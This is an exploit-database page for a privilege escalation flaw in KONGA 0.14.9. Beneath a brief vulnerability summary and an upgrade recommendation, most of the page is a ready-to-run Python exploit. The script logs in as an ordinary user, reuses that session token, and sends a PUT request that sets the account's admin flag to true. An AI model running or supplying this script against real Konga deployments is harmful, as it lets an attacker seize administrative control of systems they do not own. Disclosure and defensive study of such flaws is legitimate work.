header-logo
Suggest Exploit
vendor:
KONGA
by:
Fabricio Salomao & Paulo Trindade
8.8
CVSS
HIGH
Privilege Escalation
264
CWE
Product Name: KONGA
Affected Version From: 0.14.9
Affected Version To: 0.14.9
Patch Exists: YES
Related CWE:
CPE: a:pantsel:konga
Metasploit:
Other Scripts:
Platforms Tested: Linux - Ubuntu 20.04.3 LTS (focal)
2021

KONGA 0.14.9 – Privilege Escalation

A vulnerability in KONGA 0.14.9 allows an attacker to escalate privileges by changing a normal user to an admin user. This is done by sending a PUT request to the /api/user/<user_id> endpoint with the admin parameter set to true and the token parameter set to the token obtained from the login request. This vulnerability can be exploited by an authenticated attacker.

Mitigation:

Upgrade to the latest version of KONGA.
Source

Exploit-DB raw data:

# Exploit Title: KONGA 0.14.9 - Privilege Escalation
# Date: 10/11/2021
# Exploit Author: Fabricio Salomao & Paulo Trindade (@paulotrindadec)
# Vendor Homepage: https://github.com/pantsel/konga
# Software Link: https://github.com/pantsel/konga/archive/refs/tags/0.14.9.zip
# Version: 0.14.9
# Tested on: Linux - Ubuntu 20.04.3 LTS (focal)



import requests
import json

urlkonga = "http://www.example.com:1337/" # change to your konga address
identifier = "usernormalkonga"            # change user
password = "changeme"                     # change password

headers = {
	"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", 
	"Content-Type": "application/json;charset=utf-8", 
	"connection-id": "", 
	"Origin": urlkonga,
	"Referer": urlkonga
}

url = urlkonga+"login"

data = {
	"identifier":identifier,
	"password":password
}

response = requests.post(url, json=data)
json_object = json.loads(response.text)
print("[+] Attack")
print("[+] Token " + json_object["token"])

url2 = urlkonga+"api/user/"+str(json_object["user"]["id"])
id = json_object["user"]["id"]
print("[+] Exploiting User ID "+str(json_object["user"]["id"]))

data2 = {
  "admin": "true",
  "passports": {
    "password": password,
    "protocol": "local"
  },
  "password_confirmation": password,
  "token":json_object["token"]
}

print("[+] Change Normal User to Admin")
response2 = requests.put(url2, headers=headers, json=data2)
print("[+] Success")

Navigation

Suggest Exploit

Services By CQR